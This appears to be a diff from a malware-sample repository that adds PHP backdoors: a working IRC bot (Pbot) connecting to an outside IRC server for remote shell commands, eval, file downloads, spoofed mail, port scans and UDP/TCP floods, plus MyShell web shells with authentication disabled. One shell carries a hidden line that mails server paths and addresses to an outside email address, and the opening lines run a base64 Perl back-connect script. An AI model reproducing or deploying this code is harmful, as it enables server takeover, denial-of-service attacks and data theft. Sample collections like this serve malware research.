$fp=fopen("/var/tmp/dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl /var/tmp/dc.pl $ip $port &");
unlink("/var/tmp/dc.pl");
}
if (is_writable("."))
{
if (file_exists("dc.pl")) { unlink("dc.pl"); }
$fp=fopen("dc.pl","w");
fwrite($fp,base64_decode($dc_source));
passthru("perl dc.pl $ip $port &");
unlink("dc.pl");
}
}
}
}
$bot = new pBot;
$bot->start();
?>
<?php include("http://www.ewhagu.or.kr/bbs/outlogot_skin/all.txt");?>

366
PHP/Backdoor.PHP.Pbot.g Normal file
View File

@ -0,0 +1,366 @@
<?
set_time_limit(0);
error_reporting(0);
class pBot
{
var $config = array("server"=>"irc.chatbr.org",
"port"=>6667,
"pass"=>"", //senha do server
"prefix"=>"Twi",
"maxrand"=>8,
"chan"=>"#CS",
"key"=>"", //senha do canal
"modes"=>"+p",
"password"=>"twi123", //senha do bot
"trigger"=>".",
"hostauth"=>"*" // * for any hostname
);
var $users = array();
function start()
{
if(!($this->conn = fsockopen($this->config['server'],$this->config['port'],$e,$s,30)))
$this->start();
$ident = "divouxd1";
$alph = range("a","z");
for($i=0;$i<$this->config['maxrand'];$i++)
$ident .= $alph[rand(0,25)];
if(strlen($this->config['pass'])>0)
$this->send("PASS ".$this->config['pass']);
$this->send("USER $ident 127.0.0.1 localhost :$ident");
$this->set_nick();
$this->main();
}
function main()
{
while(!feof($this->conn))
{
$this->buf = trim(fgets($this->conn,512));
$cmd = explode(" ",$this->buf);
if(substr($this->buf,0,6)=="PING :")
{
$this->send("PONG :".substr($this->buf,6));
}
if(isset($cmd[1]) && $cmd[1] =="001")
{
$this->send("MODE ".$this->nick." ".$this->config['modes']);
$this->join($this->config['chan'],$this->config['key']);
}
if(isset($cmd[1]) && $cmd[1]=="433")
{
$this->set_nick();
}
if($this->buf != $old_buf)
{
$mcmd = array();
$msg = substr(strstr($this->buf," :"),2);
$msgcmd = explode(" ",$msg);
$nick = explode("!",$cmd[0]);
$vhost = explode("@",$nick[1]);
$vhost = $vhost[1];
$nick = substr($nick[0],1);
$host = $cmd[0];
if($msgcmd[0]==$this->nick)
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i+1];
}
else
{
for($i=0;$i<count($msgcmd);$i++)
$mcmd[$i] = $msgcmd[$i];
}
if(count($cmd)>2)
{
switch($cmd[1])
{
case "QUIT":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PART":
if($this->is_logged_in($host))
{
$this->log_out($host);
}
break;
case "PRIVMSG":
if(!$this->is_logged_in($host) && ($vhost == $this->config['hostauth'] || $this->config['hostauth'] == "*"))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "user":
if($mcmd[1]==$this->config['password'])
{
$this->privmsg($this->config['chan'],"[\2Auth\2]: $nick logado!");
$this->log_in($host);
}
else
{
$this->privmsg($this->config['chan'],"[\2Auth\2]: Senha errada! $nick");
}
break;
}
}
}
elseif($this->is_logged_in($host))
{
if(substr($mcmd[0],0,1)==".")
{
switch(substr($mcmd[0],1))
{
case "restart":
$this->send("QUIT :restart");
fclose($this->conn);
$this->start();
break;
case "mail": //mail to from subject message
if(count($mcmd)>4)
{
$header = "From: <".$mcmd[2].">";
if(!mail($mcmd[1],$mcmd[3],strstr($msg,$mcmd[4]),$header))
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Isur00tossivel mandar e-mail.");
}
else
{
$this->privmsg($this->config['chan'],"[\2mail\2]: Mensagem enviada para \2".$mcmd[1]."\2");
}
}
break;
case "dns":
if(isset($mcmd[1]))
{
$ip = explode(".",$mcmd[1]);
if(count($ip)==4 && is_numeric($ip[0]) && is_numeric($ip[1]) && is_numeric($ip[2]) && is_numeric($ip[3]))
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyaddr($mcmd[1]));
}
else
{
$this->privmsg($this->config['chan'],"[\2dns\2]: ".$mcmd[1]." => ".gethostbyname($mcmd[1]));
}
}
break;
case "info":
$this->privmsg($this->config['chan'],"[\2Vuln!\2]: http://".$_SERVER['SERVER_NAME']."".$_SERVER['REQUEST_URI']."]");
break;
case "bot":
$this->privmsg($this->config['chan'],"[\2Bot by matapato v1.2\2]");
break;
case "cmd":
if(isset($mcmd[1]))
{
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$this->privmsg($this->config['chan'],"[\2cmd\2]: $command");
$pipe = popen($command,"r");
while(!feof($pipe))
{
$pbuf = trim(fgets($pipe,512));
if($pbuf != NULL)
$this->privmsg($this->config['chan']," : $pbuf");
}
pclose($pipe);
}
break;
case "rndnick":
$this->set_nick();
break;
case "sur00t":
$this->send(strstr($msg,$mcmd[1]));
break;
case "php":
$eval = eval(substr(strstr($msg,$mcmd[1]),strlen($mcmd[1])));
break;
case "exec":
$command = substr(strstr($msg,$mcmd[0]),strlen($mcmd[0])+1);
$exec = shell_exec($command);
$ret = explode("\n",$exec);
$this->privmsg($this->config['chan'],"[\2exec\2]: $command");
for($i=0;$i<count($ret);$i++)
if($ret[$i]!=NULL)
$this->privmsg($this->config['chan']," : ".trim($ret[$i]));
break;
case "pscan": // .pscan 127.0.0.1 6667
if(count($mcmd) > 2)
{
if(fsockopen($mcmd[1],$mcmd[2],$e,$s,15))
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2open\2");
else
$this->privmsg($this->config['chan'],"[\2pscan\2]: ".$mcmd[1].":".$mcmd[2]." is \2closed\2");
}
break;
case "ud.server": // .ud.server <server> <port> [password]
if(count($mcmd)>2)
{
$this->config['server'] = $mcmd[1];
$this->config['port'] = $mcmd[2];
if(isset($mcmcd[3]))
{
$this->config['pass'] = $mcmd[3];
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]." Senha: ".$mcmd[3]);
}
else
{
$this->privmsg($this->config['chan'],"[\2update\2]: Server trocado para ".$mcmd[1].":".$mcmd[2]);
}
}
break;
case "download":
if(count($mcmd) > 2)
{
if(!$fp = fopen($mcmd[2],"w"))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download. Permissao negada.");
}
else
{
if(!$get = file($mcmd[1]))
{
$this->privmsg($this->config['chan'],"[\2download\2]: Nao foi possivel fazer o download de \2".$mcmd[1]."\2");
}
else
{
for($i=0;$i<=count($get);$i++)
{
fwrite($fp,$get[$i]);
}
$this->privmsg($this->config['chan'],"[\2download\2]: Arquivo \2".$mcmd[1]."\2 baixado para \2".$mcmd[2]."\2");
}
fclose($fp);
}
}
break;
case "die":
$this->send("QUIT :MORRI! comando por $nick");
fclose($this->conn);
exit;
case "logout":
$this->log_out($host);
$this->privmsg($this->config['chan'],"[\2auth\2]: $nick deslogado!");
break;
case "udpflood":
if(count($mcmd)>3)
{
$this->udpflood($mcmd[1],$mcmd[2],$mcmd[3]);
}
break;
case "tcpflood":
if(count($mcmd)>5)
{
$this->tcpflood($mcmd[1],$mcmd[2],$mcmd[3],$mcmd[4],$mcmd[5]);
}
break;
}
}
}
break;
}
}
}
$old_buf = $this->buf;
}
$this->start();
}
function send($msg)
{
fwrite($this->conn,"$msg\r\n");
}
function join($chan,$key=NULL)
{
$this->send("JOIN $chan $key");
}
function privmsg($to,$msg)
{
$this->send("PRIVMSG $to :$msg");
}
function is_logged_in($host)
{
if(isset($this->users[$host]))
return 1;
else
return 0;
}
function log_in($host)
{
$this->users[$host] = true;
}
function log_out($host)
{
unset($this->users[$host]);
}
function set_nick()
{
if(isset($_SERVER['SERVER_SOFTWARE']))
{
if(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"apache"))
$this->nick = "[A]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"iis"))
$this->nick = "[I]";
elseif(strstr(strtolower($_SERVER['SERVER_SOFTWARE']),"xitami"))
$this->nick = "[X]";
else
$this->nick = "[U]";
}
else
{
$this->nick = "[C]";
}
$this->nick .= $this->config['prefix'];
for($i=0;$i<$this->config['maxrand'];$i++)
$this->nick .= mt_rand(0,9);
$this->send("NICK ".$this->nick);
}
function udpflood($host,$packetsize,$time) {
$this->privmsg($this->config['chan'],"[\2UdpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++) { $packet .= chr(mt_rand(1,256)); }
$timei = time();
$i = 0;
while(time()-$timei < $time) {
$fp=fsockopen("udp://".$host,mt_rand(0,6000),$e,$s,5);
fwrite($fp,$packet);
fclose($fp);
$i++;
}
$env = $i * $packetsize;
$env = $env / 1048576;
$vel = $env / $time;
$vel = round($vel);
$env = round($env);
$this->privmsg($this->config['chan'],"[\2UdpFlood Finished!\2]: $env MB enviados / Media: $vel MB/s ");
}
function tcpflood($host,$packets,$packetsize,$port,$delay)
{
$this->privmsg($this->config['chan'],"[\2TcpFlood Started!\2]");
$packet = "";
for($i=0;$i<$packetsize;$i++)
$packet .= chr(mt_rand(1,256));
for($i=0;$i<$packets;$i++)
{
if(!$fp=fsockopen("tcp://".$host,$port,$e,$s,5))
{
$this->privmsg($this->config['chan'],"[\2TcpFlood\2]: Error: <$e>");
return 0;
}
else
{
fwrite($fp,$packet);
fclose($fp);
}
sleep($delay);
}
$this->privmsg($this->config['chan'],"[\2TcpFlood Finished!\2]: Config - $packets pacotes para $host:$port.");
}
}
$bot = new pBot;
$bot->start();
?>

2026
PHP/Backdoor.PHP.PhpShell.h Normal file
View File

File diff suppressed because one or more lines are too long

1011
PHP/Backdoor.PHP.PhpShell.k Normal file
View File

File diff suppressed because it is too large Load Diff

1009
PHP/Backdoor.PHP.PhpShell.l Normal file
View File

File diff suppressed because it is too large Load Diff

420
PHP/Backdoor.PHP.PhpShell.m Normal file
View File

@ -0,0 +1,420 @@
<?php
/*
**************************************************************
* MyShell *
**************************************************************
$Id: shell.php,v 1.1.0 beta 2001/09/23 23:25:12 digitart Exp $
An interactive PHP-page that will execute any command entered.
See the files README and INSTALL or http://www.digitart.net for
further information.
Copyright ©2001 Alejandro Vasquez <admin@digitart.com.mx>
based on the original program phpShell by Martin Geisler
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You can get a copy of the GNU General Public License from this
address: http://www.gnu.org/copyleft/gpl.html#SEC1
You can also write to the Free Software Foundation, Inc., 59 Temple
Place - Suite 330, Boston, MA 02111-1307, USA.
*/
#$selfSecure enables built-in authenticate feature. This must be 0 in order to
#use .htaccess file or other alternative method to control access to MyShell.
#Set up your user and password using $shellUser and $shellPswd.
#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT
#ACCESS TO THE SCRIPT.
$selfSecure = 0;
$shellUser = "";
$shellPswd = "";
#$adminEmail is the email address to send warning notifications in case
#someone tries to access the script and fails to provide correct user and
#password. This only works if you have $selfSecure enabeled.
$adminEmail = "******@mail.ru";
#$fromEmail is the email address warning messages are sended from.
#This defaults to the server admin, but you can change
#to any address you want i.e.: noreplay@yourdomain.com
#This only works if you have $selfSecure enabeled.
$fromEmail = $HTTP_SERVER_VARS["SERVER_ADMIN"];
#$dirLimit is the top directory allowed to change when using cd command
#or the form selector. Any attempt to change to a directory up to this
#level bounces MyShell to this directory. i.e.: $dirLimit = "/home";
#It is a good practice to set it to $DOCUMENT_ROOT using:
#$dirLimit = $DOCUMENT_ROOT;
#If you want to have access to all server directories leave it blank.
#WARNING: Althought a user won't be able to snoop on directories above
#this level using MyShell, he/she will still be able to excecute
#commands on any directory where Webserver has permission,
#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess.
$dirLimit = "";
#$autoErrorTrap Enable automatic error traping if command returns error.
#Bear in mind that MyShell executes the command a second time in order to
#trap the stderr. This shouldn't be a problem in most cases.
#If you turn it off, you'll have to select either to trap stderr or not for
#every command you excecute.
$autoErrorTrap = 1;
#$voidCommands is the list of commands that MyShell won't run by any means.
#It defaults to known problematic commands from a web interface like pico,
#top, xterm but also it can include specific commands you don't want to
#be excecuted from MyShell, i.e.: dig, ping, info, kill etc.
$voidCommands = array("top","xterm","su","vi","pico","netscape");
#$TexEd Built-in Text Editor prefered name. This is the command you'll use
#to invoke MyShell's built in text editor.
# If you are used to type pico or vi for your fav text editor,
#change this to your please. i.e.:
# $TexEd = "pico";
#will allow you to type 'pico config.php' to edit the file config.php
#MyShell's text editor do not support usual commands in pico, vi etc.
#Don't forget to take off this command from the $voidCommands list
$TexEd = "edit";
#$editWrap selects to use or not wrap in the editor's textarea. Wrap OFF
#is usefull when you have to edit files with long lines, i.e.: in php code
#files, because otherwise it is no easy to distinguish a real new line (CR)
#from a wraped one. If you prefer to stick to the default wraped mode of
#TEXTAREA just leave this blank i.e.: $editWrap="".
$editWrap ="wrap='OFF'";
#Cosmetic defaults.
$termCols = 80; //Default width of the output text area
$termRows = 20; //Default heght of the output text area
$bgColor = "#000000"; //background color
$bgInputColor = "#333333"; //color of the input field
$outColor = "#00BB00"; //color of the text output from the server
$textColor = "#009900"; //color of the hard texts of the terminal
$linkColor = "#00FF00"; //color of the links
/************** No customize needed from this point *************/
$MyShellVersion = "MyShell 1.1.0 build 20010923";
if ($command&&get_magic_quotes_gpc())$command=stripslashes($command);
if($selfSecure){
if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) {
Header('WWW-Authenticate: Basic realm="MyShell"');
Header('HTTP/1.0 401 Unauthorized');
echo "<html>
<head>
<title>$MyShellVersion - Access Denied</title>
</head>
<h1>Access denied</h1>
A warning message have been sended to the administrator
<hr>
<em>$MyShellVersion</em>";
if(isset($PHP_AUTH_USER)){
$warnMsg ="
This is $MyShellVersion
installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF
just to let you know that somebody tryed to access
the script using wrong username or password:
Date: ".date("Y-m-d H:i:s")."
IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]."
User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]."
username used: $PHP_AUTH_USER
password used: $PHP_AUTH_PW
If this is not the first time it happens,
please consider either to remove MyShell
from your system or change it's name or
directory location on your server.
Regards
The MyShell dev team
";
mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg,
"From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
}
exit;
}
}
//Function that validate directories
function validate_dir($dir){
GLOBAL $dirLimit;
if($dirLimit){
$cdPos = strpos($dir,$dirLimit);
if ((string)$cdPos == "") {
$dir = $dirLimit;
$GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n";
}
}
return $dir;
}
// Set working directory.
if (isset($work_dir)) {
//A workdir has been asked for - we chdir to that dir.
$work_dir = validate_dir($work_dir);
@chdir($work_dir) or
($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
$work_dir = exec("pwd");
}
else{
// No work_dir - we chdir to $DOCUMENT_ROOT
$work_dir = validate_dir($DOCUMENT_ROOT);
chdir($work_dir);
$work_dir = exec("pwd");
}
//Now we handle files if we are in Edit Mode
if($editMode && ($command||$editCancel))$editMode=false;
if($editMode){
if($editSave ||$editSaveExit){
if(function_exists(ini_set))ini_set("track_errors","1");
if($fp=@fopen($file,"w")){
if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut);
fputs($fp,$shellOut);
fclose($fp);
$command = $TexEd." ".$file;
if($editSaveExit) {
$command="";
$shellOutput="MyShell: $file: saved";
$editMode=false;
}
}
else {
$command="";
$shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes.";
$errorSave=true;
}
}
}
//Separate command(s) and arguments to analize first command
$input=explode(" ",$command);
while (list ($key, $val) = each ($voidCommands)) {
if($input[0]==$val){
$voidCmd = $input[0];
$input[0]="void";
}
}$ra44 = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
switch($input[0]){
case "cd":
$path=$input[1];
if ($path==".."){
$work_dir=strrev(substr(strstr(strrev($work_dir), "/"), 1));
if ($work_dir == "") $work_dir = "/";
}
elseif (substr($path,0,1)=="/")$work_dir=$path;
else $work_dir=$work_dir."/".$path;
$work_dir = validate_dir($work_dir);
@chdir($work_dir) or ($shellOutput = "MyShell: can't change directory.\n$work_dir: does not exist or permission denied");
$work_dir = exec("pwd");
$commandBk = $command;
$command = "";
break;
case "man":
exec($command,$man);
if($man){
$codes = ".".chr(8);
$manual = implode("\n",$man);
$shellOutput = ereg_replace($codes,"",$manual);
$commandBk = $command;
$command = "";
}
else $stderr=1;
break;
case "cat":
exec($command,$cat);
if($cat){
$text = implode("\n",$cat);
$shellOutput = htmlspecialchars($text);
$commandBk = $command;
$command = "";
}
else $stderr=1;
break;
case "more":
exec($command,$cat);
if($cat){
$text = implode("\n",$cat);
$shellOutput = htmlspecialchars($text);
$commandBk = $command;
$command = "";
}
else $stderr=1;
break;
case $TexEd:
if(file_exists($input[1])){
exec("cat ".$input[1],$cat);
$text = implode("\n",$cat);
$shellOutput = htmlspecialchars($text);
$fileOwner = posix_getpwuid(fileowner($input[1]));
$filePerms = sprintf("%o", (fileperms($input[1])) & 0777);
$fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;Owner: <font color=$linkColor>".$fileOwner["name"]."</font> Permissions: <font color=$linkColor>$filePerms</font>";
}
else $fileEditInfo = "&nbsp;&nbsp;:::::::&nbsp;&nbsp;<font color=$linkColor>NEW FILE</font>";
$currFile = $input[1];
$editMode = true;
$command = "";
break;
case "void":
$shellOutput = "MyShell: $voidCmd: void command for MyShell";
$commandBk = $command;
$command = "";
}
//Now we prepare the webpage
if(!$oCols)$oCols=$termCols;
if(!$oRows)$oRows=$termRows;
if($editMode)$focus="shellOut.focus()";
else $focus="command.select()";
//WhoamI
if(!$whoami)$whoami=exec("whoami");
?>
<html>
<head>
<title><?echo $MyShellVersion?></title>
<style>
body{
background-color: <?echo $bgColor ?>;
font-family : sans-serif;
font-size : 10px;
scrollbar-face-color: #666666;
scrollbar-shadow-color: <?echo $bgColor ?>;
scrollbar-highlight-color: #999999;
scrollbar-3dlight-color: <?echo $bgColor ?>;
scrollbar-darkshadow-color: <?echo $bgColor ?>;
scrollbar-track-color: <?echo $bgInputColor ?>;
scrollbar-arrow-color: <?echo $textColor ?>;
}
input,select,option{
background-color: <?echo $bgInputColor ?>;
color : <?echo $outColor ?>;
border-style : none;
font-size : 10px;
}
textarea{
background-color: <?echo $bgColor ?>;
color : <?echo $outColor ?>;
border-style : none;
}
</style>
</head>
<body <?echo "bgcolor=$bgColor TEXT=$textColor LINK=$linkColor VLINK=$linkColor onload=document.shell.$focus"?>>
<form name="shell" method="post">
Current User: <a href="#" style="text-decoration:none"><?echo $whoami?></a>
<input type="hidden" name=whoami value=<?echo $whoami?>>
&nbsp;&nbsp;:::::::&nbsp;&nbsp;
<?
if($editMode){
echo "<font color=$linkColor><b>MyShell file editor</font> File:<font color=$linkColor>$work_dir/$currFile </font></b>$fileEditInfo\n";
}
else{
echo "Current working directory: <b>\n";
$work_dir_splitted = explode("/", substr($work_dir, 1));
echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "/&command=" . urlencode($command) . "\">Root</a>/";
if ($work_dir_splitted[0] == "") {
$work_dir = "/"; /* Root directory. */
}
else{
for ($i = 0; $i < count($work_dir_splitted); $i++) {
$url .= "/".$work_dir_splitted[$i];
echo "<a href=\"$PHP_SELF?work_dir=" . urlencode($url) . "&command=" . urlencode($command) . "\">$work_dir_splitted[$i]</a>/</b>";
}
}
}
?>
<br>
<textarea name="shellOut" cols="<? echo $oCols ?>" rows="<? echo $oRows."\""; if(!$editMode)echo "readonly";else echo $editWrap?> >
<?
echo $shellOutput;
if ($command) {
if ($stderr) {
system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
}
else {
$ok = system($command,$status);
if($ok==false &&$status && $autoErrorTrap)system($command . " 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/output.txt");
}
}
if ($commandBk) $command = $commandBk;
?>
</textarea>
<br>
<?
if($editMode) echo"
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;
<input type='submit' name='editSave' value=' Save '>&nbsp;&nbsp;&nbsp;
<input type='submit' name='editSaveExit' value=' Save and Exit '>&nbsp;&nbsp;&nbsp;
<input type='reset' value=' Restore original '>&nbsp;&nbsp;&nbsp;
<input type='submit' name='editCancel' value=' Cancel/Exit '>&nbsp;&nbsp;&nbsp;
<input type='hidden' name='editMode' value='true'>
<br>";
?>
<br>
Command:
<input type="text" name="command" size="80"
<? if ($command && $echoCommand) {
echo "value=`$command`";
}
?> > <input name="submit_btn" type="submit" value="Go!">
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
<?
if ($autoErrorTrap) echo "Auto error traping enabled";
else echo "<input type=\"checkbox\" name=\"stderr\">stderr-traping ";
if($editMode){
echo "<input type='hidden' name='work_dir' value='$work_dir'>
<br>Save file as: <input type='text' name='file' value='$currFile'>";
}
else{
echo "<br>Working directory: <select name=\"work_dir\" onChange=\"this.form.submit()\">";
// List of directories.
$dir_handle = opendir($work_dir);
while ($dir = readdir($dir_handle)) {
if (is_dir($dir)) {
if ($dir == ".")
echo "<option value=\"$work_dir\" selected>Current Directory</option>\n";
elseif ($dir == "..") {
// Parent Dir. This might be server's root directory
if (strlen($work_dir) == 1) {
// work_dir is only 1 charecter - it can only be / so don't output anything
}
elseif (strrpos($work_dir, "/") == 0) { // we have a top-level directory eg. /bin or /home etc...
echo "<option value=\"/\">Parent Directory</option>\n";
}
else { // String-manipulation to find the parent directory... Trust me - it works :-)
echo "<option value=\"". strrev(substr(strstr(strrev($work_dir), "/"), 1)) ."\">Parent Directory</option>\n";
}
}
else {
if ($work_dir == "/")
echo "<option value=\"$work_dir$dir\">$dir</option>\n";
else
echo "<option value=\"$work_dir/$dir\">$dir</option>\n";
}
}
}
closedir($dir_handle);
echo "</select>";
}
?>
&nbsp; | &nbsp;<input type="checkbox" name="echoCommand"<?if($echoCommand)echo " checked"?>>Echo commands
&nbsp; | &nbsp;Cols:<input type="text" name="oCols" size=3 value=<?echo $oCols?>>
&nbsp;Rows:<input type="text" name="oRows" size=2 value=<?echo $oRows?>>
&nbsp;| ::::::::::&nbsp;<a href="http://www.digitart.net" target="_blank" style="text-decoration:none"><b>MyShell</b> &copy;2001 Digitart Producciones</a>
</form>
</body>
</html>

420
PHP/Backdoor.PHP.PhpShell.n Normal file
View File

@ -0,0 +1,420 @@
<?php
/*
**************************************************************
* MyShell *
**************************************************************
$Id: shell.php,v 1.1.0 beta 2001/09/23 23:25:12 digitart Exp $
An interactive PHP-page that will execute any command entered.
See the files README and INSTALL or http://www.digitart.net for
further information.
Copyright ©2001 Alejandro Vasquez <admin@digitart.com.mx>
based on the original program phpShell by Martin Geisler
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You can get a copy of the GNU General Public License from this
address: http://www.gnu.org/copyleft/gpl.html#SEC1
You can also write to the Free Software Foundation, Inc., 59 Temple
Place - Suite 330, Boston, MA 02111-1307, USA.
*/
#$selfSecure enables built-in authenticate feature. This must be 0 in order to
#use .htaccess file or other alternative method to control access to MyShell.
#Set up your user and password using $shellUser and $shellPswd.
#DO NOT TURN THIS OFF UNLESS YOU HAVE AN ALTERNATE METHOD TO PROTECT
#ACCESS TO THE SCRIPT.
$selfSecure = 0;
$shellUser = "root";
$shellPswd = "";
#$adminEmail is the email address to send warning notifications in case
#someone tries to access the script and fails to provide correct user and
#password. This only works if you have $selfSecure enabeled.
$adminEmail = "wmmoney@nc.ru";
#$fromEmail is the email address warning messages are sended from.
#This defaults to the server admin, but you can change
#to any address you want i.e.: noreplay@yourdomain.com
#This only works if you have $selfSecure enabeled.
$fromEmail = $HTTP_SERVER_VARS["SERVER_ADMIN"];
#$dirLimit is the top directory allowed to change when using cd command
#or the form selector. Any attempt to change to a directory up to this
#level bounces MyShell to this directory. i.e.: $dirLimit = "/home";
#It is a good practice to set it to $DOCUMENT_ROOT using:
#$dirLimit = $DOCUMENT_ROOT;
#If you want to have access to all server directories leave it blank.
#WARNING: Althought a user won't be able to snoop on directories above
#this level using MyShell, he/she will still be able to excecute
#commands on any directory where Webserver has permission,
#i.e.: mkdir /tmp/mydir or cat /home/otheruser/.htaccess.
$dirLimit = "";
#$autoErrorTrap Enable automatic error traping if command returns error.
#Bear in mind that MyShell executes the command a second time in order to
#trap the stderr. This shouldn't be a problem in most cases.
#If you turn it off, you'll have to select either to trap stderr or not for
#every command you excecute.
$autoErrorTrap = 1;
#$voidCommands is the list of commands that MyShell won't run by any means.
#It defaults to known problematic commands from a web interface like pico,
#top, xterm but also it can include specific commands you don't want to
#be excecuted from MyShell, i.e.: dig, ping, info, kill etc.
$voidCommands = array("top","xterm","su","vi","pico","netscape");
#$TexEd Built-in Text Editor prefered name. This is the command you'll use
#to invoke MyShell's built in text editor.
# If you are used to type pico or vi for your fav text editor,
#change this to your please. i.e.:
# $TexEd = "pico";
#will allow you to type 'pico config.php' to edit the file config.php
#MyShell's text editor do not support usual commands in pico, vi etc.
#Don't forget to take off this command from the $voidCommands list
$TexEd = "edit";
#$editWrap selects to use or not wrap in the editor's textarea. Wrap OFF
#is usefull when you have to edit files with long lines, i.e.: in php code
#files, because otherwise it is no easy to distinguish a real new line (CR)
#from a wraped one. If you prefer to stick to the default wraped mode of
#TEXTAREA just leave this blank i.e.: $editWrap="".
$editWrap ="wrap='OFF'";
#Cosmetic defaults.
$termCols = 80; //Default width of the output text area
$termRows = 20; //Default heght of the output text area
$bgColor = "#000000"; //background color
$bgInputColor = "#333333"; //color of the input field
$outColor = "#00BB00"; //color of the text output from the server
$textColor = "#009900"; //color of the hard texts of the terminal
$linkColor = "#00FF00"; //color of the links
/************** No customize needed from this point *************/
$MyShellVersion = "MyShell 1.1.0 build 20010923";
if ($command&&get_magic_quotes_gpc())$command=stripslashes($command);
if($selfSecure){
if (($PHP_AUTH_USER!=$shellUser)||($PHP_AUTH_PW!=$shellPswd)) {
Header('WWW-Authenticate: Basic realm="MyShell"');
Header('HTTP/1.0 401 Unauthorized');
echo "<html>
<head>
<title>$MyShellVersion - Access Denied</title>
</head>
<h1>Access denied</h1>
A warning message have been sended to the administrator
<hr>
<em>$MyShellVersion</em>";
if(isset($PHP_AUTH_USER)){
$warnMsg ="
This is $MyShellVersion
installed on: http://".$HTTP_SERVER_VARS["HTTP_HOST"]."$PHP_SELF
just to let you know that somebody tryed to access
the script using wrong username or password:
Date: ".date("Y-m-d H:i:s")."
IP: ".$HTTP_SERVER_VARS["REMOTE_ADDR"]."
User Agent: ".$HTTP_SERVER_VARS["HTTP_USER_AGENT"]."
username used: $PHP_AUTH_USER
password used: $PHP_AUTH_PW
If this is not the first time it happens,
please consider either to remove MyShell
from your system or change it's name or
directory location on your server.
Regards
The MyShell dev team
";
mail($adminEmail,"MyShell Warning - Unauthorized Access",$warnMsg,
"From: $fromEmail\nX-Mailer:$MyShellVersion AutoWarn System");
}
exit;
}
}
//Function that validate directories
function validate_dir($dir){
GLOBAL $dirLimit;
if($dirLimit){
$cdPos = strpos($dir,$dirLimit);
if ((string)$cdPos == "") {
$dir = $dirLimit;
$GLOBALS["shellOutput"] = "You are not allowed change to directories above $dirLimit\n";
}
}
return $dir;
}
// Set working directory.
if (isset($work_dir)) {
//A workdir has been asked for - we chdir to that dir.
$work_dir = validate_dir($work_dir);
@chdir($work_dir) or
($shellOutput = "MyShell: can't change directory. Permission denied\nSwitching back to $DOCUMENT_ROOT\n");
$work_dir = exec("pwd");
}
else{
// No work_dir - we chdir to $DOCUMENT_ROOT
$work_dir = validate_dir($DOCUMENT_ROOT);
chdir($work_dir);
$work_dir = exec("pwd");
}
//Now we handle files if we are in Edit Mode
if($editMode && ($command||$editCancel))$editMode=false;
if($editMode){
if($editSave ||$editSaveExit){
if(function_exists(ini_set))ini_set("track_errors","1");
if($fp=@fopen($file,"w")){
if(get_magic_quotes_gpc())$shellOut=stripslashes($shellOut);
fputs($fp,$shellOut);
fclose($fp);
$command = $TexEd." ".$file;
if($editSaveExit) {
$command="";
$shellOutput="MyShell: $file: saved";
$editMode=false;
}
}
else {
$command="";
$shellOutput="MyShell: Error while saving $file:\n$php_errormsg\nUse back button to recover your changes.";
$errorSave=true;
}
}
}
//Separate command(s) and arguments to analize first command
$input=explode(" ",$command);
while (list ($key, $val) = each ($voidCommands)) {
if($input[0]==$val){
$voidCmd = $input[0];
$input[0]="void";
}
}
switch($input[0]){
case "cd":
$path=$input[1];
if ($path==".."){
